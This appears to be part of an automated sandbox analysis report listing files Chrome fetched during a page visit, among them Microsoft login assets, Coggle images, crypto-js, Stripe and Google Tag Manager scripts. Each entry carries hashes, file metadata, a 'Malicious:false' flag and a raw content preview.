                                                                  SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                  Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:GIF image data, version 89a, 352 x 3
                                                                  Category:dropped
                                                                  Size (bytes):2672
                                                                  Entropy (8bit):6.640973516071413
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:166DE53471265253AB3A456DEFE6DA23
                                                                  SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                  SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                  SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                  Category:downloaded
                                                                  Size (bytes):1052
                                                                  Entropy (8bit):7.549553458129663
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:020536762DA0A6FE62B3D8A596B9A2B8
                                                                  SHA1:741B0681BFAD38F7A5908BBBDE22B4D92428D4D5
                                                                  SHA-256:1BDAFB688B4F573EEC9293FF3A9F945F4B3405CDD99C9177F3F00506BCBBB9CD
                                                                  SHA-512:197240FD854BBA6605535BE94DBCDF9756537D454C9D0059707D45EC322F5B0ED83FC548CBBE68C4AE8B6AAD4F961BA5F44C95C90C461F6ADDBF4FEA6818F019
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://static.coggle.it/assets/i/presentd8c070de.png
                                                                  Preview:.PNG........IHDR...@...@......iq.....sBIT....|.d.....pHYs............I....tEXtSoftware.www.inkscape.org..<....XtEXtCopyright.CC0 Public Domain Dedication http://creativecommons.org/publicdomain/zero/1.0/......5IDATx...k.A..w.....E-..l.C?D..".<.E.C...PT,^..HQ.T...{.....D.(. HCv.\....1.v^.NK....l...n.d.w.}.Iv7..`0.....`0......-.....B.`.JCk....e.g..b..x...W..h.zU03......Ro.XxK.Z...x.4BD..y^E.5....g..Q....R5..}T.Y..|..o...w..1..6....n..1..6....n..1..6....n..1..6....n.....(y%fYVO.P...= .*.(.....>.N.#.A......x.....".m..O$..R..~.`f..~...%...z.e"..%....j...z..L_f~gY.h...Z.........y.;..0.u1.9...H..-.g!..../jo...03...).g..m.Z=......l%.<3...y...].pX.OB..D..z.........z...Q..4..u{../kf>...........X..H.T.........ka...6.i.q....q...&.L.QaqqqST>#....m.......P...d....R....].AI$.x.w...H).9g.v.......!..........{(....(....<. ..D4.8..Z......$...J.M..(. ....`K..V.]..+.N..x".N.....J..<...A).............e..T..R...i.........p&.y..g:........X...i..@D....`V..5....L&3..V.=.n...~._.u.S
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):16
                                                                  Entropy (8bit):3.875
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:46DF3E5E2D15256CA16616EBFDA5427F
                                                                  SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                                                                  SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                                                                  SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAnxAN--Rm0-gBIFDZFhlU4=?alt=proto
                                                                  Preview:CgkKBw2RYZVOGgA=
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):48316
                                                                  Entropy (8bit):5.6346993394709
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:2CA03AD87885AB983541092B87ADB299
                                                                  SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                  SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                  SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                  Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 450x451, components 3
                                                                  Category:dropped
                                                                  Size (bytes):3784
                                                                  Entropy (8bit):7.150194199582859
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:0E74F3F34B3AF69DFC61EFAC41ECF4F8
                                                                  SHA1:98087A7E3602785EC183FF8867EA26B0820EC748
                                                                  SHA-256:69EA31659592E4E274A0A2EFDE879051FD2B1A36609A71FAC53D5423091EBCA8
                                                                  SHA-512:56D07DC32E38400DACA29637062C6585CABA1223EE2B12C54FEC0099D44929454BA7B2E6BE9F6FEAEAE672DAB6141EADA9D0A0BD99414195F5E0B90868C13CC8
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:......JFIF.....H.H.....C....................................................................C............................................................................"...................................,....................!1aAQq.......B.2."..b.........................................................?..\.\k...@...D}.X.f>....=...LvX..h..t?.@...l......O.f..@.&xU....:..5.p...Z.xN........u.t.t.]....."C@.X...o....b.......y.*....L...}....fz.9....."3r..l.@6.x.../..Y_.MtZ..N.......[Z.@6DP..rW.`Du.........}h.....K...@....d.<.'..#J.....g.J.........S7....x.&K.l..eH..c.E.....Q.h4..."+.............d....kQ......._@Ao.....6...?.z............/.....?l.$M.\....`........I.P6f...l..=.1.....c&...^._{.{.w...fgb..p...\...`....l.}}.........5=...........6c........A'J... ..LT.........6~@.&9&n@..P.0..R..*.....1^....'.EuX.....R^vk..l..... #do..X..P...&.*....V@........r... c.<...............`....N$.g.....vN.."$.....@/. .3..T.....u............Z.F ..? .X/.......#$k...OZ[...@Lv......]..bk.c...@.h........
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Unicode text, UTF-8 text, with very long lines (65530), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):710624
                                                                  Entropy (8bit):5.380994712178419
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:3D8401528CDD8BD9084CABE163A4D49E
                                                                  SHA1:AFDC01920BDA0564F63210FCC173D454541C0EE1
                                                                  SHA-256:4B7D606F072E90F890D9EC60AB9862CD791E9342AFADF1EA33F0C0216D1BCA8F
                                                                  SHA-512:A3EF4E295FDA6D311D6AE2AEF4FA28620BC7A5E7D96D9E0AE9667D71135EC2B51CBC7B6B39F48163A7B548F1963C201C1418A0B282CEA576366F2ABF67BCBFDF
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:!function(){function e(t){var n=o[t];if(void 0!==n)return n.exports;var i=o[t]={id:t,loaded:!1,exports:{}};return r[t](i,i.exports,e),i.loaded=!0,i.exports}var t,n,r={723:function(e,t,n){"use strict";function r(e){l.length||(a(),!0),l[l.length]=e}function o(){for(;d<l.length;){var e=d;if(d+=1,l[e].call(),d>1024){for(var t=0,n=l.length-d;t<n;t++)l[t]=l[t+d];l.length-=d,d=0}}l.length=0,d=0,!1}function i(e){return function(){function t(){clearTimeout(n),clearInterval(r),e()}var n=setTimeout(t,0),r=setInterval(t,50)}}e.exports=r;var a,c,s,u,l=[],d=0,p=void 0!==n.g?n.g:self,m=p.MutationObserver||p.WebKitMutationObserver;"function"==typeof m?(c=1,s=new m(o),u=document.createTextNode(""),s.observe(u,{characterData:!0}),a=function(){c=-c,u.data=c}):a=i(o),r.requestFlush=a,r.makeRequestCallFromTimer=i},5937:function(e,t,n){e.exports=n.p+"fingerprinted/img/abnamro-4445e65420800f96f68cfc67a273f66b.svg"},1520:function(e,t,n){e.exports=n.p+"fingerprinted/img/asn-3d9b1bbff2f8f12105510992dbb37ae8.svg
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (17021)
                                                                  Category:downloaded
                                                                  Size (bytes):394063
                                                                  Entropy (8bit):5.649294879270145
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:DA10719BC1E75AE23494706AE3EC7A77
                                                                  SHA1:53F8D39A1A87594F5BC595FAB72D5D426F919A8A
                                                                  SHA-256:F97A88AACA2FFA998C9C494354FAC41B53420D2363CA5475BBA3009939B22234
                                                                  SHA-512:3FF40E8ED83B2043BD7847467D9A94E68A3463DF839C397A06877CD3BAD3CA1D76070F89DAD0D442E51ED27DF22DF33947773411FABCEF0AEB61C76992DCD557
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://www.googletagmanager.com/gtag/js?id=G-HDHP586LJX&cx=c&_slc=1
                                                                  Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ga_send","priority":17,"vtp_value":true,"tag_id":9},{"function":"__ogt_session_timeout","priority":17,"vtp_sessionMinutes":30,"vtp_sessionHours":0,"tag_id":11},{"function":"__ogt_1p_data_v2","priority":17,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELE
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                                  Category:downloaded
                                                                  Size (bytes):20410
                                                                  Entropy (8bit):7.980582012022051
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                                  SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                                  SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                                  SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                                  Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):123025
                                                                  Entropy (8bit):5.064156745135437
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:97D5D88569D2BC1AE9F3B0D00788FBB7
                                                                  SHA1:696F579DFE1263AAB90539B51E67E02DFD52D6CD
                                                                  SHA-256:C92DF84A2768B5F72176BA63ECEEC9D5DCA985FAE4DBB300990565DAAD4B4A49
                                                                  SHA-512:86D1E78EFE32F9D8E400BFFF49152A6FDBAD5CB0B7CE510266D888BD71810C5A98096910CC15197A8FE0DD81A02D3B2810D156AECE42330EED725ABBCA633ABD
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://static.coggle.it/assets/main.3381cf83453f46e1.css
                                                                  Preview:/*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,o
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 180 x 86, 8-bit/color RGBA, non-interlaced
                                                                  Category:downloaded
                                                                  Size (bytes):11461
                                                                  Entropy (8bit):7.922777483594519
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:70DC9DD37399D0C99F3860D3F2146263
                                                                  SHA1:A8DB3F058659BFF8FF55117FFC44CB59000AB83A
                                                                  SHA-256:BA0D74E3F3AE919694EAD3B64DA871F7CEC5B2BDDC1C8D50DF511614E10FB579
                                                                  SHA-512:AF2C86CC1A3A20408312B667BBD927BCFD3F09BC78996095961909C05D4A0A05EAB2C8B6347D59BD9EF07AB3B6D56BF0BAED89B639F88B96D283D24A5504ECB8
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://static.coggle.it/img/coggle.png
                                                                  Preview:.PNG........IHDR.......V.....fA.... .IDATx..}y.\U....s.zM...NWVB.P..#...DQQ.YDQ.a..Q.O.GQPA?F.qaT...eD.qAA.Q...#. I:Ko.K:.t.....#.iN.Nwu......d!}.{....r.j...\.......dV=Ui..1......766.BD.WJ. .p.\..S.XU;..c9..f....{.....2..Vm.....S...D...D....!_.tm.......f.)".".....Z39jk.....p....x.=x....5.][....DD....H.. ...[...][..B..n...!"..p.)...n.../"...(hF.-5@......o.hi.J...~.S..SX[...... "......S..5.][3.|>.@D.GD.....4M.k......<.......x.. ..l..:..q.AD.....yhhh....:.$..17.F6..~.S....k..k.....Y.. .C../5@.....@k..D<$.....s...5@....B1.s.(#....#"x.1.j.....~>^..,.J.8.........:`Vsss+.<.........~pp.X.tm=...... ..,E........{..p.j.."sc."..?..C..k....b.]...qX(..|8. k...G.D.R...d.....v......O. u.{.i..j+^.3....I..8....b.~zO.o]KKK^k..{O.........kk.HL...../.........0.?......"z)"......Qh...r.8.>?<<.....[ZZ.k.O!....rD.......x..444t...5.=y....."q.Q"..!.g.....l..?....M.,Mm../......3....@.I.t>..&.....f.8.11/...S>.........w...v.ep....WSp.......U.........~l.....g......d..[=...s..
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):940363
                                                                  Entropy (8bit):5.5700433415253015
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:915A5360B0FB858BC392E823469093BB
                                                                  SHA1:929541BC204ACFE2CD15686DC0883966466A3388
                                                                  SHA-256:4D92993E07D11CCA17C25F8EE9FCD45A149BA040BA51B909E79E7A2C854CB465
                                                                  SHA-512:15775E673BCB4BA3AA84E8FF2038CC70E4432DA7429D3F73D01B41EA43BF6931CA406908E8EAAE7C3EF9D2A22388CE17A6F6B0D3AE9B09139FA4CF6877E05FB2
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://js.stripe.com/v3/fingerprinted/js/controller-7d778a6e91c82633a9fc73f284d32e86.js
                                                                  Preview:!function(){function e(t){var n=i[t];if(void 0!==n)return n.exports;var r=i[t]={id:t,loaded:!1,exports:{}};return a[t](r,r.exports,e),r.loaded=!0,r.exports}var t,n,r,a={94184:function(e,t){var n;!function(){"use strict";function r(){for(var e=[],t=0;t<arguments.length;t++){var n=arguments[t];if(n){var i=typeof n;if("string"===i||"number"===i)e.push(n);else if(Array.isArray(n)&&n.length){var o=r.apply(null,n);o&&e.push(o)}else if("object"===i)for(var s in n)a.call(n,s)&&n[s]&&e.push(s)}}return e.join(" ")}var a={}.hasOwnProperty;e.exports?(r.default=r,e.exports=r):void 0===(n=function(){return r}.apply(t,[]))||(e.exports=n)}()},62322:function(e,t,n){e.exports=n.p+"fingerprinted/data/countryRanges-da252f255fed0fefce3e3b3c60707e3d.json"},8464:function(e,t,n){e.exports=n.p+"fingerprinted/data/countries_ar-7995ee218dfd37546f754bd73b67e2cc.json"},90342:function(e,t,n){e.exports=n.p+"fingerprinted/data/countries_bg-c9f7496faecf6cafdeb3cf831b179cc8.json"},32726:function(e,t,n){e.exports=n.p+"f
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):176
                                                                  Entropy (8bit):5.0830039192559076
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:96F5B26D366F47393B3FF36FE7471474
                                                                  SHA1:6CAA14FF7E3692BEB752734C28CBEA160C113B7A
                                                                  SHA-256:07B6B3D899DD69C0E9EB463E23E10E30E82588EDDF95D15D45BB505C6703A813
                                                                  SHA-512:970801461D6E12D7C14752B7844F1C0347650897A8C9C1540BD0CE49CABCFBF760A9B6B891DA828537F6AD49099608F205E5D47149CB71043DC9915E215E8574
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://js.stripe.com/v3/fingerprinted/js/trusted-types-checker-efd8cf45ce422659c098993bfc62531b.js
                                                                  Preview:"use strict";(window.webpackChunkStripeJSouter=window.webpackChunkStripeJSouter||[]).push([[913],{9554:function(e,n,r){r.r(n),r.d(n,{loaded:function(){return t}});var t=!0}}]);
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:ASCII text, with very long lines (1335)
                                                                  Category:dropped
                                                                  Size (bytes):1569
                                                                  Entropy (8bit):5.369127779967127
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:0CC3A63FE10060AF4A349E5DF666EEFE
                                                                  SHA1:3E8D3925B550345123F2CAB26568221FD4154F9C
                                                                  SHA-256:92FCA55833F48B4289AC8F1CEDD48752B580FCE4EC4B5D81670B8193D6E51B54
                                                                  SHA-512:5801C9DB98C4998480772CA5AD71F0E400C4756AE713AAB0358CA6593B3A3426499D6DEC81A768C861CBBCD8394DD8C6D647628A13F124FF3A1119F9B7793E8C
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:(function(){var e=window,h=document,k="replace";var m=function(a,c,d,b,g){c=encodeURIComponent(c)[k](/\(/g,"%28")[k](/\)/g,"%29");a=a+"="+c+"; path="+(d||"/")+"; ";g&&(a+="expires="+(new Date((new Date).getTime()+g)).toGMTString()+"; ");b&&"none"!=b&&(a+="domain="+b+";");b=h.cookie;h.cookie=a;return b!=h.cookie},p=function(a){var c=h.body;try{c.addEventListener?c.addEventListener("click",a,!1):c.attachEvent&&c.attachEvent("onclick",a)}catch(d){}};var q=function(a,c,d,b){this.get=function(){for(var b=void 0,c=[],d=h.cookie.split(";"),l=new RegExp("^\\s*"+a+"=\\s*(.*?)\\s*$"),f=0;f<d.length;f++){var n=d[f].match(l);n&&c.push(decodeURIComponent(n[1][k](/%28/g,"(")[k](/%29/g,")")))}for(d=0;d<c.length;d++)c[d]&&(b=c[d]);return b};this.set=function(g){return m(a,g,b,c,1E3*d)};this.remove=function(){return m(a,"",b,c,-100)}};var t=function(a,c){var d=void 0;if("function"==typeof a.get&&"function"==typeof a.set){var b=c||{},g=b.hasOwnProperty("cookieName")?b.cookieName:"_gali",r=b.hasOwnProper
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:GIF image data, version 89a, 352 x 3
                                                                  Category:downloaded
                                                                  Size (bytes):3620
                                                                  Entropy (8bit):6.867828878374734
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                  SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                  SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                  SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                                  Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                  Category:dropped
                                                                  Size (bytes):17174
                                                                  Entropy (8bit):2.9129715116732746
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                  SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                  SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                  SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):61
                                                                  Entropy (8bit):3.990210155325004
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                  SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                  SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                  SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                                                  Category:downloaded
                                                                  Size (bytes):697676
                                                                  Entropy (8bit):5.576523189922213
                                                                  Encrypted:false
                                                                  SSDEEP:
                                                                  MD5:2B9E1ECD7827D4C2E65F10A1495B5166
                                                                  SHA1:301A3FBAB09FB030114A5102ED5F59F7FFAF6125
                                                                  SHA-256:157FD17F1BFC76EEFA7292EEFF31B377A896F6CE89831E55D1348AC85B2683AA
                                                                  SHA-512:4BBC23F087E3EEFE36BAE8346D21BA194BF0E4D603020CD2566D71C0C2DC552F49771CE0A48FFAA4700C7A2D7C0BCAB8C24DB4576CEA11A7A0DD24CE4FB6CE82
                                                                  Malicious:false
